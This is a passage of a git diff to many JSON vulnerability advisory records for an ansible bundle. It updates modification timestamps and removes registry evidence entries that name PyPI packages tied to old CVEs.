@@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "oslo-utils", - "subject_version": "10.1.1", - "key": "pkg:pypi/oslo-utils@10.1.1", - "resource": "oslo-utils" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2015-1852.json b/advisories/BREW-ansible@13-CVE-2015-1852.json index 3150f0273d2..471f9324a59 100644 --- a/advisories/BREW-ansible@13-CVE-2015-1852.json +++ b/advisories/BREW-ansible@13-CVE-2015-1852.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2015-1852", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-p9wq-mjh8-q72m", "CVE-2015-1852", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-keystoneclient", - "subject_version": "5.8.0", - "key": "pkg:pypi/python-keystoneclient@5.8.0", - "resource": "python-keystoneclient" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2015-2296.json b/advisories/BREW-ansible@13-CVE-2015-2296.json index b4f3debb1ef..31f7f778c6a 100644 --- a/advisories/BREW-ansible@13-CVE-2015-2296.json +++ b/advisories/BREW-ansible@13-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2015-2296", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2015-3206.json b/advisories/BREW-ansible@13-CVE-2015-3206.json index 0617ecfe9ea..608148d9dc7 100644 --- a/advisories/BREW-ansible@13-CVE-2015-3206.json +++ b/advisories/BREW-ansible@13-CVE-2015-3206.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2015-3206", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mffc-9gx5-99g3", "CVE-2015-3206", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "kerberos", - "subject_version": "1.3.1", - "key": "pkg:pypi/kerberos@1.3.1", - "resource": "kerberos" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2015-3908.json b/advisories/BREW-ansible@13-CVE-2015-3908.json index 27e02a4ba0e..35f704cceb1 100644 --- a/advisories/BREW-ansible@13-CVE-2015-3908.json +++ b/advisories/BREW-ansible@13-CVE-2015-3908.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2015-3908", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-w64c-pxjj-h866", "CVE-2015-3908", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2015-6240.json b/advisories/BREW-ansible@13-CVE-2015-6240.json index 1f9a961311f..5fb94a606cf 100644 --- a/advisories/BREW-ansible@13-CVE-2015-6240.json +++ b/advisories/BREW-ansible@13-CVE-2015-6240.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2015-6240", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wwwh-47wp-m522", "CVE-2015-6240", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2015-8557.json b/advisories/BREW-ansible@13-CVE-2015-8557.json index e5dda8a33e1..87d27172536 100644 --- a/advisories/BREW-ansible@13-CVE-2015-8557.json +++ b/advisories/BREW-ansible@13-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2015-8557", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-10745.json b/advisories/BREW-ansible@13-CVE-2016-10745.json index 61b4aa70169..e9e03014775 100644 --- a/advisories/BREW-ansible@13-CVE-2016-10745.json +++ b/advisories/BREW-ansible@13-CVE-2016-10745.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-10745", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hj2j-77xm-mc5v", "CVE-2016-10745", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-3096.json b/advisories/BREW-ansible@13-CVE-2016-3096.json index 713e54778ea..5f113e801ee 100644 --- a/advisories/BREW-ansible@13-CVE-2016-3096.json +++ b/advisories/BREW-ansible@13-CVE-2016-3096.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-3096", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-rh6x-qvg7-rrmj", "CVE-2016-3096", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-8614.json b/advisories/BREW-ansible@13-CVE-2016-8614.json index dc5f731a1f5..627cc4b83f0 100644 --- a/advisories/BREW-ansible@13-CVE-2016-8614.json +++ b/advisories/BREW-ansible@13-CVE-2016-8614.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-8614", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cmwx-9m2h-x7v4", "CVE-2016-8614", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-8628.json b/advisories/BREW-ansible@13-CVE-2016-8628.json index a2c0b1fde49..62bcd17aaf4 100644 --- a/advisories/BREW-ansible@13-CVE-2016-8628.json +++ b/advisories/BREW-ansible@13-CVE-2016-8628.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-8628", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jg4f-jqm5-4mgq", "CVE-2016-8628", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-8647.json b/advisories/BREW-ansible@13-CVE-2016-8647.json index 79b847ddf65..d7c5a475d40 100644 --- a/advisories/BREW-ansible@13-CVE-2016-8647.json +++ b/advisories/BREW-ansible@13-CVE-2016-8647.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-8647", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-x4cm-m36h-c6qj", "CVE-2016-8647", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-9015.json b/advisories/BREW-ansible@13-CVE-2016-9015.json index 36837fe1534..22acf5917cf 100644 --- a/advisories/BREW-ansible@13-CVE-2016-9015.json +++ b/advisories/BREW-ansible@13-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-9015", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2016-9587.json b/advisories/BREW-ansible@13-CVE-2016-9587.json index 4bb998a1d37..b224be1af48 100644 --- a/advisories/BREW-ansible@13-CVE-2016-9587.json +++ b/advisories/BREW-ansible@13-CVE-2016-9587.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2016-9587", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-m956-frf4-m2wr", "CVE-2016-9587", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2017-18342.json b/advisories/BREW-ansible@13-CVE-2017-18342.json index 4a9bfc6b525..93eff968fc4 100644 --- a/advisories/BREW-ansible@13-CVE-2017-18342.json +++ b/advisories/BREW-ansible@13-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2017-18342", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2017-7466.json b/advisories/BREW-ansible@13-CVE-2017-7466.json index f9e5ca1596e..ebcb84bbb31 100644 --- a/advisories/BREW-ansible@13-CVE-2017-7466.json +++ b/advisories/BREW-ansible@13-CVE-2017-7466.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2017-7466", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3m8p-xpm6-8ww3", "CVE-2017-7466", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2017-7481.json b/advisories/BREW-ansible@13-CVE-2017-7481.json index 24f9aa4e40f..4e7eb8a809f 100644 --- a/advisories/BREW-ansible@13-CVE-2017-7481.json +++ b/advisories/BREW-ansible@13-CVE-2017-7481.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2017-7481", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-w578-j992-554x", "CVE-2017-7481", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2017-7550.json b/advisories/BREW-ansible@13-CVE-2017-7550.json index 89c62de3940..eb33007fcd6 100644 --- a/advisories/BREW-ansible@13-CVE-2017-7550.json +++ b/advisories/BREW-ansible@13-CVE-2017-7550.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2017-7550", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-588w-w6mv-3cw5", "CVE-2017-7550", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-1000805.json b/advisories/BREW-ansible@13-CVE-2018-1000805.json index 882a336cce8..40d2abad810 100644 --- a/advisories/BREW-ansible@13-CVE-2018-1000805.json +++ b/advisories/BREW-ansible@13-CVE-2018-1000805.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-1000805", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-f2j6-wrhh-v25m", "CVE-2018-1000805", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-10855.json b/advisories/BREW-ansible@13-CVE-2018-10855.json index 06aad9ba666..8bd096e4c30 100644 --- a/advisories/BREW-ansible@13-CVE-2018-10855.json +++ b/advisories/BREW-ansible@13-CVE-2018-10855.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-10855", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jwcc-j78w-j73w", "CVE-2018-10855", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-10874.json b/advisories/BREW-ansible@13-CVE-2018-10874.json index 5db912e1a9d..ee184098977 100644 --- a/advisories/BREW-ansible@13-CVE-2018-10874.json +++ b/advisories/BREW-ansible@13-CVE-2018-10874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-10874", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3xvg-x47j-x75w", "CVE-2018-10874", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-10875.json b/advisories/BREW-ansible@13-CVE-2018-10875.json index f6a5d5543cf..1919c324cad 100644 --- a/advisories/BREW-ansible@13-CVE-2018-10875.json +++ b/advisories/BREW-ansible@13-CVE-2018-10875.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-10875", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-fc4h-467w-46rh", "CVE-2018-10875", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-16837.json b/advisories/BREW-ansible@13-CVE-2018-16837.json index d9b90e5dbd4..269cf06e63a 100644 --- a/advisories/BREW-ansible@13-CVE-2018-16837.json +++ b/advisories/BREW-ansible@13-CVE-2018-16837.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-16837", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hwrm-63v2-42g4", "CVE-2018-16837", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-16859.json b/advisories/BREW-ansible@13-CVE-2018-16859.json index c5c698b8648..0f8984ce74e 100644 --- a/advisories/BREW-ansible@13-CVE-2018-16859.json +++ b/advisories/BREW-ansible@13-CVE-2018-16859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-16859", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-v735-2pp6-h86r", "CVE-2018-16859", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-16876.json b/advisories/BREW-ansible@13-CVE-2018-16876.json index 093387207e3..8349912e16c 100644 --- a/advisories/BREW-ansible@13-CVE-2018-16876.json +++ b/advisories/BREW-ansible@13-CVE-2018-16876.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-16876", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-j569-fghw-f9rx", "CVE-2018-16876", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-18074.json b/advisories/BREW-ansible@13-CVE-2018-18074.json index acfab65bfd0..e8a43bd780e 100644 --- a/advisories/BREW-ansible@13-CVE-2018-18074.json +++ b/advisories/BREW-ansible@13-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-18074", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-19787.json b/advisories/BREW-ansible@13-CVE-2018-19787.json index ad9470cc2fc..188fb23fcd3 100644 --- a/advisories/BREW-ansible@13-CVE-2018-19787.json +++ b/advisories/BREW-ansible@13-CVE-2018-19787.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-19787", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-xp26-p53h-6h2p", "CVE-2018-19787", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-20060.json b/advisories/BREW-ansible@13-CVE-2018-20060.json index 1694d66cd72..5d94f69687b 100644 --- a/advisories/BREW-ansible@13-CVE-2018-20060.json +++ b/advisories/BREW-ansible@13-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-20060", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-25091.json b/advisories/BREW-ansible@13-CVE-2018-25091.json index a4e17987ed7..6691426bed4 100644 --- a/advisories/BREW-ansible@13-CVE-2018-25091.json +++ b/advisories/BREW-ansible@13-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-25091", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2018-7750.json b/advisories/BREW-ansible@13-CVE-2018-7750.json index 163c9332fca..205255d9b1c 100644 --- a/advisories/BREW-ansible@13-CVE-2018-7750.json +++ b/advisories/BREW-ansible@13-CVE-2018-7750.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2018-7750", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-232r-66cg-79px", "CVE-2018-7750", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-10156.json b/advisories/BREW-ansible@13-CVE-2019-10156.json index 4d4d7ed03e8..3853cdafd9f 100644 --- a/advisories/BREW-ansible@13-CVE-2019-10156.json +++ b/advisories/BREW-ansible@13-CVE-2019-10156.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-10156", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-grgm-pph5-j5h7", "CVE-2019-10156", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-10206.json b/advisories/BREW-ansible@13-CVE-2019-10206.json index 0926c91a8d1..0b5b41e63d8 100644 --- a/advisories/BREW-ansible@13-CVE-2019-10206.json +++ b/advisories/BREW-ansible@13-CVE-2019-10206.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-10206", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cqmr-rcpr-cxh3", "CVE-2019-10206", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-10217.json b/advisories/BREW-ansible@13-CVE-2019-10217.json index 380edaa4bf9..3066d5fbf9e 100644 --- a/advisories/BREW-ansible@13-CVE-2019-10217.json +++ b/advisories/BREW-ansible@13-CVE-2019-10217.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-10217", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-p75j-wc34-527c", "CVE-2019-10217", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-10906.json b/advisories/BREW-ansible@13-CVE-2019-10906.json index 2dff3ba8eb3..485a2801939 100644 --- a/advisories/BREW-ansible@13-CVE-2019-10906.json +++ b/advisories/BREW-ansible@13-CVE-2019-10906.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-10906", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-462w-v97r-4m45", "CVE-2019-10906", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2019-11236.json b/advisories/BREW-ansible@13-CVE-2019-11236.json index 63c5feb0cb5..407fe646146 100644 --- a/advisories/BREW-ansible@13-CVE-2019-11236.json +++ b/advisories/BREW-ansible@13-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2019-11236", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": 